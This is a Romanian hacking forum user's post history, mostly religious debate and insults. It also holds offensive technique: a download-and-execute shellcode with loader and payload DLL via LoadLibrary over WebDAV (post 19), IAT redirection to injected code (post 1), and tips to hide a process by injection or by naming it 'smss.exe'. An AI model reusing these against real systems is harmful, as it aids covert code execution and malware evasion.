Jump to content

SlicK

Active Members
  • Posts

    350
  • Joined

  • Last visited

  • Days Won

    5

Everything posted by SlicK

  1. Daca vrei sa rescrii un executabil in primul rand trebuie sa-ti faci griji doar daca nu vrei sa-l strici Ca sa "automatizezi" procesul pe care il faci cu olly trebuie sa folosesti un dissasembler si trebuie sa ti-l cam scrii singur( nu te-as sfatui sa faci asta decat daca vrei sa intrii adanc in arhitectura procesoarelor, machine code si executabile, daca te apuci atunci incepi de aici http://download.intel.com/design/intarch/manuals/24319101.pdf) totusi poti sa separi instructiunile din codul executabil folosind doar prima parte dintr-un disasembler anume parserul(e mai simplu de scris decat un dissasembler intreg dar tot nu e o chestie simpla) care iti da marimea intructiunii in functie de opcode deci poti stii unde se termina o instructiune oarecare si poti scrie ceva dupa ea fara sa risti sa suprapui 2 instructiuni(in marea majoritate asta cauzeaza un crash). Alta solutie ar fi de exemplu sa cauti call'uri deja existente(opcode 0xE8) si sa le rescrii adresa(urmatorii 4 bytes) dar tot trebuie sa te asiguri ca opcodul tau e chiar un opcode si nu face parte din alta instructiune(iti trebuie minim un dissasembly parser) (din cauza asta pica si varianta cu cautatul 0x90'ului pentru ca poti sa-l gasesti intr'o adresa de jump de exemplu) O alta problema pe care o ai este sa te asiguri ca executia va ajunge la adresa unde ai scris tu codul, si nu e asa usor cum pare. Cam singurul mod simplu in care poti face chestia asta(daca am inteles bine care e chestia) este sa rescrii o adresa din IAT pentru un API care stii sigur ca se va executa (ExitProcess la sfarsit sau GetStartupInfoA la inceput) si sa-i pui adresa catre codul tau redirectionand apoi call'ul. Cu siguranta mai sunt si alte metode dar nu-mi mai amintesc nici una acum
  2. SlicK

    Punct de inceput

    Wireshark, Flash Decompiler Trillix(sau Sothink SWF Decompiler) si un limbaj simplu in care poti sa lucrezi cu socketuri(gen perl, python sau php).
  3. Am vazut ca unii au avut probleme cu dll'uri lipsa. Download tot de aici
  4. nu sunt criptate , sunt hashurile md5 ale intrebarilor.
  5. Un mic tool pentru monitorizarea API'urilor apelate de catre un executabil. Permite vizualizarea parametrilor primiti si valorilor returnate. Enjoy... Screen: Download: APIMonitor.zip
  6. SlicK

    I'm Back

    I'm back bitch!!! adminii si astia cautati-ma.
  7. #include <windows.h> int main() { HWND Handle=GetDesktopWindow(); ShellExecute(Handle,"open","http://www.google.com/",NULL,NULL,SW_SHOWDEFAULT); return 0; } sau #include <windows.h> int main() { ShellExecute(NULL,"open","http://www.google.com/",NULL,NULL,SW_SHOWDEFAULT); return 0; } sau #include <windows.h> int main() { ShellExecute(HWND_DESKTOP,"open","http://www.google.com/",NULL,NULL,SW_SHOWDEFAULT); return 0; }
  8. WTF are you talking about? Ce legatura are experimentul Philadelphia(in care s-a incercat "indoirea" luminii pentru a creea iluzia de invizibilitate) cu toata treaba asta? Ideea asta(destul de veche de altfel) este practic imposibila din mai multe motive(presupunem ca te referi doar la planeta noastra pentru ca restul universului este in mare parte necunoscut pentru noi): 1: Pamantul nu este un sistem izolat, este influentat intr-o foarte mare masura de factori externi (soare, planete etc) 2: Reproducerea virtuala ar trebui sa dureze doar o cuanta de timp(30 de ani? lol) 3: Memorarea atator informatii este imposibila. Daca pentru memorarea fiecarui atom real este nevoie de cel putin inca un atom atunci avem nevoie de un hard disk cel putin la fel de mare ca planeta noastra. .... ....(sunt prea multe si mi-e prea lene sa scriu) .... Presupunand totusi ca am reusi sa facem o copie virtuala a pamantului am avea doua utilizari(de fapt trei, dar calcularea trecutui implica un cu totul alt sistem care sa afle cauza cunoscand efectul): 1: Vom putea calcula matematic viitorul exact(practic imposibil pentru ca nu cunoastem cum functioneaza si reactioneaza fiecare sistem in parte) 2: Vom putea calcula cu un anumit grad de probabilitate un viitor posibil(un infinit de variante) In oricare din aceste doua variante simpla cunoastere a viitorului va duce inevitabil la modificarea acestuia. Daca ai creea un cerc virtual de porti logice vei avea un flux circular(la fel de virtual) de electroni, dar nu vor fi aceeasi. Curentul electric va circula tot liniar si chiar daca vei avea un cerc de electroni acesta va fi format din electronii care se deplaseaza intre doua porti. Despre aberatiile cu "globalizarea comenzilor" si "unificarea instructiunilor" nici nu ma obosesc pentru ca nici tu nu sti ce ai vrut sa spui.( "Select All" nu e nici macar o comanda sau o intructiune, este o utilitate a shell'ului si nu are treaba cu DOS'ul)
  9. HA HA HA, Uite taranu iar. Pai daca am face un clasament tu nu ai fi nici pe departe in el, si in asta de acum ar trebui sa fi "bautor de pisat' ca la cunostintele tale vaste in materie de calculatoare si frauda esti cam la nivelul unei maimute dresate sa traga de mouse si sa dea click Nu ne invata ma nimic si nici sa nu-ti publici "ce sti" ca ramai fara "roate" si "maile" Besi ma draq de aici cu "jmekeriile" tale
  10. LOL Inca unu care se crede "hecar". De obicei nu fac off-topic sau flame dar tu ma scoti din sarite... Hai ca esti tare, stii ma macar cu ce se mananca protocolul RDP? auzi la el "conexiune directa pe un anumit protocol" Ai idee cum functioneaza exploitul de Real VNC datorita caruia ai tu "800 de servere", ai auzit macar de challenge si challenge response? Te-ai gandit macar ca in 3 ani scanezi toate ip'urile IPv4 de 50 de ori la rand? Nu te mai da rotund cu ce ai mai prins tu de la baietii mai mari ca nu te vad bine. Si cand te mai duci la scoala, asa intre 2 rooturi nasa.gov, mai treci si pe la ora de Romana ca vorbesti de parca ai trait sub o piatra si ai invatat sa vorbesti de la televizor.
  11. Ideea e urmatoarea: clientul captureaza desktopul in format bitmap(24bpp), il converteste in grayscale(pt a scadea dimensiunea,8bpp) si il comprima (LZO) apoi se conecteaza la server si trimite bitmapul care este decomprimat si afisat. Pentru a micsora si mai mult dimensiunea, clientul trimite initial imaginea intreaga iar apoi doar partile care s-au modificat. Serverul poate fi modificat bineinteles pentru a accepta mai multi clienti. Sursa(proiect Dev) si executabile: http://rapidshare.com/files/105121707/RV_RST.rar.html
  12. Va dati voi seama ce face... DOWNLOAD: http://rapidshare.com/files/104388252/trilu.rar.html
  13. Toate cele 7 tutoriale despre xss facute de mine http://rapidshare.com/files/103887449/XSS-VIDEOS-SlicK-rstcenter.com.rar.html
  14. Si tu in loc sa arunci niste stringuri aiurea ar fi trebuit sa explici pe ce forumuri functioneaza, daca mai functioneaza, de ce functioneaza, cine a descoperit bugul etc...etc...
  15. Nu poti sa impui ajutorul, daca vrea cineva te ajuta, daca nu...te rogi degeaba. Dupa cum a formulat intrebarea e clar ca nu prea are habar cu ce se mananca perl'ul si nici atat un modul cu alte cuvinte baza canci, deci inainte sa invete cum sa foloseasca modulul lui Vhaerun ar trebui sa invete sa foloseasca perl'ul. Probabil de aia nu i-a raspuns nimeni.
  16. Download: http://rapidshare.com/files/97973451/ETSDecoder.rar.html PS: Pentru cei care nu stiu inca ETS nu mai contine parola criptata ci tokenul de autentificare.
  17. Chestia asta se poate face oarecum simplu pentru orice conexiune dial-up folosind librariile RAS. Programul creeaza conexiunea si apoi se deconecteaza. Un "while" acolo e destul de simplu de bagat #include <windows.h> #include <stdio.h> #include <ras.h> #include <raserror.h> BOOL DisconnectRas() { BOOL bRet=FALSE; RASCONN ras[20]; DWORD dSize,dNumber,dCount; ras[0].dwSize=sizeof(RASCONN); dSize=sizeof(ras); if(RasEnumConnections(ras,&dSize,&dNumber)==0) { bRet=TRUE; for(dCount=0;dCount<dNumber;dCount++) { if(RasHangUp(ras[dCount].hrasconn)!=0) { bRet=FALSE; break; } } } return(bRet); } BOOL ConnectRas() { char szPhoneNumber[]="xxxxxx"; // nr de telefon pt conectare char szUserName[] ="yyyyyy"; // user char szPassword[] ="zzzzzzz"; // pass RASDIALPARAMS rdParams; rdParams.dwSize=sizeof(RASDIALPARAMS); rdParams.szEntryName[0]='\0'; lstrcpy(rdParams.szPhoneNumber,szPhoneNumber); rdParams.szCallbackNumber[0]='\0'; lstrcpy(rdParams.szUserName,szUserName); lstrcpy(rdParams.szPassword,szPassword); rdParams.szDomain[0]='\0'; HRASCONN hRasConn=NULL; if(RasDial(NULL,NULL,&rdParams,0L,NULL,&hRasConn)==0) { return(TRUE); } return(FALSE); } int main(int argc, char *argv[]) { if(ConnectRas()==TRUE) { printf("Connected. Press any key to dissconnect\n"); getchar(); if(DisconnectRas()==TRUE) { printf("Disconnected\n"); } else { printf("Error disconnecting\n"); } } else { printf("Error Connecting\n"); } getchar(); return(0); } Linkati cu "rasapi32"
  18. Acest programel este un exemplu de server http care asteapta conexiuni (in cazul acesta pe portul 88 ) si la conectare ofera o interfata HTML prin care poate fi controlat. Autentificarea se face prin WWW Basic (admin/parola) Download: http://rapidshare.com/files/97771590/online.rar.html Arhiva contine sursele si proiectul Dev-C++
  19. Mini Download&Exec shellcode Autor: SlicK Website: http://www.rstcenter.com/ Aceasta metoda de download si executie se bazeaza pe API'ul windows LoadLibrary(). Acesta primeste ca parametru calea unui fisier(dll sau executabil) si il mapeaza in memorie. In cazul in care fisierul este un dll, functia entry point a acestuia este apelata cu parametrul "DLL_PROCESS_ATTACH". Un fapt mai putin cunoscut despre acest API este ca poate de asemenea sa incarce fisiere aflate pe servere WebDAV. WebDAV este o extensie a protocolului http care foloseste requesturi asemanatoare care insa nu pot fi tratate de un server http obisnuit fara extensiile corespunzatoare. Pentru a incarca un fisier prin intermediul WebDAV, LoadLibrary este apelat astfel: LoadLibrary("\\SERVER\FISIER") sau in C++: LoadLibray("\\\\SERVER\\FISIER"); Exemplu C++ (loader.cpp) #include <windows.h> int main() { LoadLibrary("\\\\127.0.0.1\\x.dll"); return(0); } Acum avem nevoie si de un dll care sa fie incarcat si rulat. Exemplu C++ (payload.cpp) #include <windows.h> extern "C" BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpvReserved) { if(dwReason==DLL_PROCESS_ATTACH) { MessageBox(NULL,"Dll injected successfully.","Injected",MB_OK|MB_ICONINFORMATION); } return TRUE; } Ca sa folosim acest dll pormin Mini WebDAV (il gasiti in arhiva) alegeti directorul unde se afla fisierul payload.dll si "Start Server", apoi rulati loader.exe Daca totul a functionat cum trebuia ar trebui sa apara mesajul din dll ("Dll injected successfully"); Un exemplu de shellcode poate fi urmatorul (39 bytes): char shellcode[]= "\xE8\x18\x00\x00\x00" //call procedure "\x5C\x5C\x31\x32\x37\x2E\x30\x2E\x30\x2E\x31\x5C\x70\x61\x79\x6C\x6F\x61\x64\x2E\x64\x6C\x6C\x00" //db '\\127.0.0.1\payload.dll',0 "\xBB\x9C\x3F\x88\x7C" //mov ebx,0x7C883F9C ;LoadLibraryA "\xFF\xD3"; //call ebx Folosindu-ne de proprietatea API'ului de a adauga ".dll" la fisierele fara extensie putem micsora numele fisierului si deci a shellcodului pana la 26 de bytes: char shellcode[]= "\xE8\x0E\x00\x00\x00" //call procedure "\x5C\x5C\x31\x32\x37\x2E\x30\x2E\x30\x2E\x31\x5C\x78\x00" //db '\\127.0.0.1\x',0 "\xBB\x9C\x3F\x88\x7C" //mov ebx,0x7C883F9C ;LoadLibraryA "\xFF\xD3"; //call ebx Daca ip'ul ar fi de genul "1.1.1.1" ar aduce shellcodul la 24 de bytes fapt care il face cel mai mic shellcode de acest gen. ARHIVA: http://rapidshare.com/files/97291649/Mini-D_E.rar.html
  20. @Kimnoryze: Nu prea halesc teoriile astea conspirative si pana acum nu am intalnit nici o situatie care sa ma faca sa cred ca masonii ar vrea sa ne schimbe religia. Faptul ca patriarhul romaniei a fost ucis(?) nu dovedeste existenta lui Dumnezeu. Nu vad rostul mersului la biserica, stai in picioare intre niste babe barfitoare in miros de tamaie, nu te invata Biblia ca Dumnezeu e in fiecare dintre noi? ce rost are sa pierzi 2 ore intr-o cladire pictata? In zilele noastre multe comunitati crestine minoritare nu au nevoie de biserici pentru a crede. Moastele sfinte sunt doar niste oase din cate stiu eu deci nu prea au cum sa putrezeasca. Chestia cu lumanarile nu am auzit-o dar pare cam trasa de par. @alcol: era vorba de o mumificare naturala care daca s-ar intampla numai oamenilor religiosi ar fi un adevarat argument insa nu este cazul, mumificarea naturala se poate manifesta atunci cand dintr-un motiv sau altul bacteriile care provoaca descompunerea nu pot supravietui sau cadavrul este complet deshidratat. Nu vad legatura dintre mumificare si "chipul cioplit". Nu ma refeream la cei care erau ucisi cu pietre datorita faptului ca erau crestini si ma refeream la crestinii care ii omorau cu pietre pe cei care comiteau un pacat in comunitatea lor. Nu sunt de acord nici cu ridicarea unui om la rangul de sfant. Cine hotaraste ca omul acela a trait ca un adevarat sfant? Stefan cel mare(care acum e si sfant) a incalcat cel putin 2 porunci: sa nu ucizi si sa nu preacurvesti si totusi mai-marii bisericii nostre au hotarat ca e sfant...pfff..... Nu stiu ce ai inteles tu din Biblie insa eu am inteles ca nu conteaza ca ai trait o viata pacatoasa, daca regreti cu adevarat pacatele iti sunt iertate(vezi spovedania) si ajungi in rai.
  21. Parerea mea e ca asa a fost conceputa astfel incat fiecare sa inteleaga ce vrea si sa se poata regasi in randurile acelea. Intrebarea e alta, daca sunt cuvintele lui Dumnezeu prin intermediul profetilor sau doar o insiruire de povestiri si sfaturi care ar trebui urmate? Ce ai spus tu sprijina teoria conspirativa ca biblia e doar un mijloc de a controla masele("prosti da multi"), un taran nu se va rascula atata timp cand crede ca boierul care-l biciuieste va arde o eternitate in iad. Pana la urma de ce trebuie sa existe acest test al lui Dumnezeu? ce inseamna 70 de ani pe pamant fata de o infinitate in rai? tinde spre zero. atunci de ce sa mai traim? doar ca sa demonstram ca putem crede in ceva cei 70 de ani?(am observat ca in final nu faptele bune conteaza ci credinta). Asta sa fie motivul existentei umane? vointa de a crede? e cam indoilenic
  22. Interesant la ce discutii s-a ajuns..cel putin sunt mai interesante decat cele despre conquiztador. Nu am nimic cu credinta..din punctul meu de vedere credinta e un lucru foarte bun pentru un individ atata timp cat nu trece la fanatism sau fundamentalism, insa parerea mea e ca cei care iau biblia si ce spun toti popii burtosi drept fapte sunt cam inapoiati. Daca exista un Dumnezeu (un zeu central nu conteaza care, sunt toti la fel) de ce lasa sa se intample toate chestiile astea pe care le traim zi de zi? oare pentru el e o gluma? ne-a aruncat o carte in brate(biblie,coran nu conteaza) si acum se uita la noi raznd cum incercam sa o descifram? Ciudat ca nu se mai intampla o Sodoma sau o Gomora, nu cred ca pe vremea aia se faceau lucruri mai rele decat acum Daca Dumnezeu ne-a creeat doar pe noi(o specie inteligenta pe o planeta) de ce a facut si atatea miliarde si miliarde de sori,sisteme solare,galaxii si ce mai e prin spatiu? oricum nu ne afecteaza mai deloc ce e in afara sistemului nostru solar. Daca a creeat oamenii si le-a spus sa "se inmulteasca" de ce a facut mai multa apa si mai putin pamant? (diferenta e destul de mare). De ce Noe a salvat cate 2 animale din fiecare specie? ar fi durat o singura zi creearea tuturor animalelor, s-a lenevit brusc? De ce e important botezul la crestini? copii care mor inainte de botez ajung in iad? ei nu au avut macar sansa sa faca o singura alegere fie buna fie rea. Daca toti oamenii mergeau in iad datorita pacatului primordial inainte de aparitia lui Isus inseamna ca pacatele se trasmit in familie? Adica eu pot ajunge in iad datorita pacatelelor stramosilor mei chiar daca eu fac fapte bune? sau situatia s-a schimbat acum 2000 de ani si omenii dinainte au fost doar un experiment. Cu mult timp inainte pacatosii erau omorati cu pietre in ciuda poruncii "sa nu ucizi" inseamna ca personele care ii omorau pe pacatosi erau in afara legii divine? Daca oamenii sunt atat de speciali si am fost creeati intr-o singura zi la fel ca si restul fiintelor de ce suntem practic animale si functionam la fel ca animalele?(cu exceptia constiintei care aparent e singurul lucu care ne deosebeste de restul mamiferelor) Si sa nu incep sa vorbesc despre practicile bisericesti crestine care incep sa si ridicole si sa treaca in paganism. Biblia ridica mai multe intrebari(cred ca as umple multe pagini cu ele) decat raspunsuri desi scopul ar trebuit sa fie contrariul. De ce permite Dumnezeu existenta divolului? singurul scop al acestuia este sa faca oamenii sa se indoiasca de Dumnezeu. Oare El chiar vrea ca oamenii fara personalitate si usor influentabili sa ajunga in iad? Daca omenii nu sunt capabili sa inteleaga complexitatea spatiului sau a unui organism nu inseamna ca o fiinta/constiinta superioarea le-a creeat(creatia este numitorul cumun in fiecare impreuna cu viata de dupa moarte) Nu pot totusi sa cred ca unii cred in acelasi timp in biblie si in evolutia darwiniana desi una o elimina pe cealalta. @go_sword: crucea este un simbol pagan derivat din crucea zodiacala(in religiile catolice exista si in cerc in centrul crucii desi Isus a fost crucificat pe o cruce "simpla" ca sa zic asa) Daca Ioana d'Arc a fost indrumata de Dumnezeu in eliberarea Frantei inseamna ca la fel a fost fiecare eliberator din istorie? Daca da: de ce istoria o mentioneaza doar pe ea? Daca Nu: Inseamna ca nu a facut mai mult decat oricare alt om deci nu poti trage automat concluzia ca a fost intrumata de divinitate. @alcol: Daca exista o singura credinta adevarata si un Dumnezeu unic care ii ajuta pe cei credinciosi de ce intamplarile si ajutorul divin se intampla si este oferit persoanelor de toate religiile? Cu alte cuvinte daca Dumnezeu il ajuta pe un credincios ortodox sa se vindece de o boala atunci credinta dreapta este cea ortodoxa deci ar trebui sa moara milioane de musulmani, catolici, evrei(etc..) care avand o alta religie sunt deci pacatosi si nu au dreptul la ajutorul divin. Istoria e plina de calugari, preoti si oameni ai lui Dumnezeu care au avut o viata curata si plina de fapte bune de ce nu exista la fel de multe mumii? Si iarasi pun accent pe faptul ca aceste lucruri se intampla oamenilor de toate religiile. @int: de ce e biblia plina de metafore cand de fapt prezinta fapte "istorice"? @sawyer: daca la sfarsitul vietii incetezi sa mai crezi inseamna ca ajungi direct in iad nu? deci citatul ala tau nu prea are sens avand in vedere citatul lui go_sword: "De vei marturisi cu gura ta ca Domnul este Iisus si vei crede in inima ta ca Dumnezeu i-a inviat pe cei morti,te vei mantui" lucru care se poate intampla si pe patul de moarte. @Kimnoryze: daca noi am fost creeati la fel ca si restul universului, atunci de ce universul este capabil de creatie? apar si dispar in continuare sori si planete. De ce nu ar fi asta si cazul planetei noastre? care in afara de faptul ca are oxigen,apa si ca traim noi pe ea nu are nimic in plus fata de alte planete. Oamenii nu traiau 500-1000 de ani, varsta biblica are sens metaforic si se refera la intelepciune(tutunul a aparut in europa acum cateva sute de ani. De atunci media de viata chiar a mai crescut avand in vedere ca acum sute de ani aveai noroc sa ajungi la 50 de ani) De ce bunica ta nu mananca porc? scrie undeva in biblie ca nu ai voie sa te folosesti de "rodul pamantului"? Cam atat deocamdata. Am pus cateva intrebari cred eu logice si astept niste raspunsuri la fel de logice.
  23. @aegis era vorba de iconita din tray pornita de alt proces. Cat despre un proces care sa stea de paza si sa-ti reporneasca procesul principal cand e inchis... nu mi se pare o idee asa buna pentru ca in functie de situatie poti pierde date cand iti este inchis procesul sau pot fi inchise amandoua odata(cel putin in intervalul acela) pentru ca oricum exista taskkill si fisiere .bat . In alta ordine de idei mai bine te injectezi intr-un proces existent sau numesti executabilul "smss.exe"
  24. (go_sword cred ca pentru un om religios avatarul tau e cam pacatos ) In lumea asta se intampla multe lucruri aparent ciudate si "out of this world" iar in lipsa de alta explicatie se gaseste repede una divina care multumeste prin aparenta plauzibilitate. Exact din acest motiv a aparut si continua sa existe religia in toate formele ei: pentru a da o explicatie lucrurilor pentru care stiinta nu are un raspuns. De multe ori oamenii de stiinta gasesc solutii logice la aceste fenomene insa nu am vazut pana acum ca religia sa contrazica un fapt dovedit stiintific. Oamenii sunt la fel de influentabili si creduli acum ca si acum 2000 e ani. Daca te-ai fi dus cu cateva sute de ani inainte cu un telefon mobil,care acum ni se pare o banalitate, oamenii aia ar fi crezut ca esti un diavol si probabil te-ar fi ars pe rug . Poate peste cateva sute de ani o sa vina unul mai inteligent si o sa zica :"prostilor. oamenii aia nu sunt posedati ci au cutare boala cauzata de cutare bacterie". Si sa nu vorbesc de "stigmatizati" care aveau ranile ba la incheietura ba in palma in functie de cum se credea pe vremea aceea, pana acum nu a fost nicioda inregistrat acest fenomen in timp ce se desfasura...bullshit
  25. Daca-i trimiti un SW_HIDE nu-ti mai apare nici in taskbar nici in alt+tab. Ca sa ascunzi iconita din tray, click dreapta pe Taskbar->Properties->Customize->alegi aplicatia si la "Behavior" alegi "Always Hide" Iar referitor la numele procesului...ma bine redeumesti executabilul decat sa incerci sa preiei controlul asupra Task Managerului sau API'urilor apelate de el ca sa-l ascunzi complet
×
×
  • Create New...